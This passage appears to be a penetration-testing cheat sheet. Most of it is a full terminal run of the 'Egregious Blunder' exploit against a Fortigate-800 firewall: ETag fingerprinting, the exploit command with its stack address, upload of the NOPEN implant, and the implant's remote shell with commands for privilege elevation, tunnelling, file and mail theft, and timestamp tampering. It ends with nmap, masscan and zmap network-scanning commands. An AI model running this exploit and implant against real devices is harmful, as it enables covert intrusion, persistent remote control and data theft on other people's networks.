Usage: -irtun target_ip call_back_port [call_back_ip] [ourtn arguements]
Usage: -jackpop target_ip target_port source_ip source_port
Usage: -nrtun port [toip [toport]]
Usage: -nstun toip [toport [localport [srcport [command]]]]
       -nstun toip:port
Usage: -rawsend tcp_port
Usage: -rtun port [toip [toport]]
Usage: -scan
Usage: -sentry target_address source_address (tcp|udp) dest_port src_port interface
Usage: -stun toip toport [localport [srcport]]
Usage: -sutun [-t ttl] toip toport [localport [srcport]]
Usage: -tunnel [command_listen_port [udp]]
Usage: -vscan  (should add help)

Remote File Commands:
Usage: -cat remfile
Usage: -chili [-l] [-s lines] [-m max] MM-DD-YYYY remdir remfile [remfile ...]
Usage: -cksum remfile ...
Usage: -fget [MM-DD-YYYY] loclist
Usage: -get [-l] [-q] [-s minimumsize] [-m MM-DD-YYYY] remfile ...
Usage: -grep [-d] [-v] [-n] [-i] [-h] [-C number_of_context_lines] pattern file1 [file2 ...]
Usage: -oget [-a] [-q] [-s begoff] [-b begoff] [-e endoff] remfile
Usage: -put locfile remfile [mode]
Usage: -strings remfile
Usage: -tail [+/-n] remfile, + to skip n lines of remfile beginning
Usage: -touch [-t mtime:atime | refremfile] remfile
Usage: -rm remfile|remdir ...
Usage: -upload file port
Usage: -mailgrep [-l] [-m maxbytes] [-r "regexp" [-v]] [-f regexpfilename [-v]] [-a "regexp for attachments to eliminate"] [-b MM-DD-YYYY] [-e MM-DD-YYYY] [-d remotedumpfile] remotedir file1 [file2 ...]
 ex: -mailgrep -a ".doc" -r "^Fred" -b 2-28-2002 /var/spool/mail G*

Remote Directory Commands:
Usage: -find [-M | -m -mkfindsargs] [-x[m|a|c] MM-DD-YYYY] remdir [remdir...]
Usage: -ls [-1ihuRt] [-x[m|a|c] MM-DD-YYYY] [remfile|remdir ...]
Usage: -cd [remdir]
Usage: -cdp

Local Client Commands:
Usage: -autopilot port [xml]
Usage: -cmdout [locfilename]
Usage: -exit
Usage: -help
Usage: -hist
Usage: -readrc [locfile]
Usage: -remark [comment]
Usage: -rem [comment]
Usage: # [comment]
Usage: -reset

Local Environment Commands:
Usage: -lcd locdir
Usage: -lgetenv
Usage: -lpwd
Usage: -lsetenv VAR=[val]
Usage: -lsh [[-q] command]

Aliases:

NO! (none):>

# Egregious Blunder (EGBL) exploit

# cat EGBL_AND_BLATSTING.txt

# pwd
/current/bin

# curl --insecure --head https://127.0.0.1 | grep ETag
ETag: "63e_4f_4683142d"

# grep 4683142d ./EGBL.config
ETAG = 4683142d : 0xbffff4a8 : 800 : 3 : 0559 # BLATSTING

# LD_LIBRARY_PATH=/current/bin/lib ./egregiousblunder_3.0.0.1 -t 127.0.0.1 -p 443 -l 1234 --ssl 1 -v --config ./EGBL.config --etag 4683142d --nopen
EGBL vers 3.0.0.1
current options:
  target IP: 127.0.0.1
  target port: 443 (SSL on)
  config file: ./EGBL.config (vers 3.0.0.1)
  etag: 4683142d (index 326)
  hardware = 800, firmware = 0559 (gen 3): etag = 4683142d
  using firmware generation 3
  source port: 1234
  install NOPEN
    noserver file to upload: /current/up/morerats/staticrats/noserver-3.3.0.1-linux-i386-static
    noclient local executable: /current/bin/noclient
    loading noserver on target as /bin/httpd, process to run as name /bin/httpsd
  verbose: 1
  debug: 0

loading nopen over HTTPS
prepping to send file /current/up/morerats/staticrats/noserver-3.3.0.1-linux-i386-static of size 356996
using stack addr 0xbffff4a8
received good ACK1 message c0edbabe
received stack addr 0xbffff4a8
sent the file len/header, next is the file
..................................
done with sending (356996 bytes), waiting for file ack
received good ACK2 message 356996, upload is cool
got file ack, file size 356996 uploaded
invoking /current/bin/noclient -i 4 to take over

NOPEN!                             v3.0.5.3

Wed Aug 17 12:29:28 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0xDD5A18A835851B4B1549DB3B984EBDE7
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version... 3.0.5.3

Connection
  Bytes In / Out     197/82 (240%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (127.0.0.1:1234)
  Remote Host:Port   (null):0 (:0)
  Remote Host:Port   Fortigate-800:443 (127.0.0.1:443)
Local
  NOPEN client       3.0.5.3
  Date/Time          Wed Aug 17 12:29:29 UTC 2016
  History
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         1749 (1748)
Remote
  NOPEN server       3.0.5.3
  WDIR               NOT SET
  OS                 Linux 2.4.25 #2 Wed Jun 27 21:28:31 EDT 2007 i686
  CWD                /
  PID (PPID)         5139 (34)

Creating history file "/current/bin/../down/history/Fortigate-800.127.0.0.1"... ok
Creating command output file "/current/bin/../down/cmdout/Fortigate-800.127.0.0.1-2016-08-17-12:29:30"... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! Fortigate-800:/>-help
[08-17-16 12:29:49 GMT][localhost:1234 -> Fortigate-800.127.0.0.1:443]
[-help]

Remote General Commands:
Usage: -elevate
Usage: -getenv
Usage: -gs category|filename [options-if-any]
Usage: -setenv VAR=[val]
Usage: -shell
Usage: -status
Usage: -time

Remote Server Commands:
Usage: -burn
Usage: -call ip port
Usage: -listen port
Usage: -pid

Remote Network Commands:
Usage: -icmptime target_ip [source_ip]
Usage: -ifconfig
Usage: -nslookup name1 ...
Usage: -ping -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -ping host
       -ping [-u|-t|-i] host
Usage: -trace -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -trace host
       -trace [-u|-t|-i] host

Remote Redirection Commands:
Usage: -fixudp port
Usage: -irtun target_ip call_back_port [call_back_ip] [ourtn arguements]
Usage: -jackpop target_ip target_port source_ip source_port
Usage: -nrtun port [toip [toport]]
Usage: -nstun toip [toport [localport [srcport [command]]]]
       -nstun toip:port
Usage: -rawsend tcp_port
Usage: -rtun port [toip [toport]]
Usage: -scan
Usage: -sentry target_address source_address (tcp|udp) dest_port src_port interface
Usage: -stun toip toport [localport [srcport]]
Usage: -sutun [-t ttl] toip toport [localport [srcport]]
Usage: -tunnel [command_listen_port [udp]]
Usage: -vscan  (should add help)

Remote File Commands:
Usage: -cat remfile
Usage: -chili [-l] [-s lines] [-m max] MM-DD-YYYY remdir remfile [remfile ...]
Usage: -cksum remfile ...
Usage: -fget [MM-DD-YYYY] loclist
Usage: -get [-l] [-q] [-s minimumsize] [-m MM-DD-YYYY] remfile ...
Usage: -grep [-d] [-v] [-n] [-i] [-h] [-C number_of_context_lines] pattern file1 [file2 ...]
Usage: -oget [-a] [-q] [-s begoff] [-b begoff] [-e endoff] remfile
Usage: -put locfile remfile [mode]
Usage: -strings remfile
Usage: -tail [+/-n] remfile, + to skip n lines of remfile beginning
Usage: -touch [-t mtime:atime | refremfile] remfile
Usage: -rm remfile|remdir ...
Usage: -upload file port
Usage: -mailgrep [-l] [-m maxbytes] [-r "regexp" [-v]] [-f regexpfilename [-v]] [-a "regexp for attachments to eliminate"] [-b MM-DD-YYYY] [-e MM-DD-YYYY] [-d remotedumpfile] remotedir file1 [file2 ...]
 ex: -mailgrep -a ".doc" -r "^Fred" -b 2-28-2002 /var/spool/mail G*

Remote Directory Commands:
Usage: -find [-M | -m -mkfindsargs] [-x[m|a|c] MM-DD-YYYY] remdir [remdir...]
Usage: -ls [-1ihuRt] [-x[m|a|c] MM-DD-YYYY] [remfile|remdir ...]
Usage: -cd [remdir]
Usage: -cdp

Local Client Commands:
Usage: -autopilot port [xml]
Usage: -cmdout [locfilename]
Usage: -exit
Usage: -help
Usage: -hist
Usage: -readrc [locfile]
Usage: -remark [comment]
Usage: -rem [comment]
Usage: # [comment]
Usage: -reset

Local Environment Commands:
Usage: -lcd locdir
Usage: -lgetenv
Usage: -lpwd
Usage: -lsetenv VAR=[val]
Usage: -lsh [[-q] command]

Aliases:

NO! Fortigate-800:/>

# Network Scanning

ARP

# netdiscover -P -r <network> | tee <scanname>-netdiscover

ICMP

# nmap -n -sn -oA <scanname>-icmp <network>

TCP

# masscan <network> -pU:0-65535 --rate 1000 --open-only --output-format <xml|binary|grepable|list|JSON> --output-filename <scanname>-masscan
# nmap -n -p- -T4 -Pn --open -oA <scanname>-nmap <network>
# nmap -n -F -T4 -Pn --open -oA <scanname>-nmap <network>
# zmap --target-port=<port> --bandwidth=10M --seed=1234 --interface=<interface> --probe-module=tcp_synscan --output-file=<scanname>-zmap <network>

UDP

# masscan <network> -p0-65535 --rate 1000 --open-only --output-format <xml|binary|grepable|list|JSON> --output-filename <scanname>-masscan
# nmap -n -p- -T4 -sU -Pn --open -oA <scanname>-nmap <network>
# nmap -n -F -T4 -sU -Pn --open -oA <scanname>-nmap <network>
# zmap --target-port=<port> --bandwidth=10M --seed=1234 --interface=<interface> --probe-module=udp --output-file=<scanname>-zmap <network>

UDP Applications: DNS, IPMI, NETBIOS, NTP, MSDNS, MSSQL, PORTMAP, SIP, SNMPv1, UPNP

# pa=<dns_53.pkt|ipmi_623.pkt|netbios_137.pkt|ntp_123.pkt|mdns_5353.pkt|mssql_1434.pkt|portmap_53.pkt|sip_options.tpl|snmp1_161.pkt|upnp_1900.pkt>
# zmap --target-port=<port> --bandwidth=10M --seed=1234 --interface=<interface> --probe-module=udp --probe-args=$pa --output-file=<scanname>-zmap <network>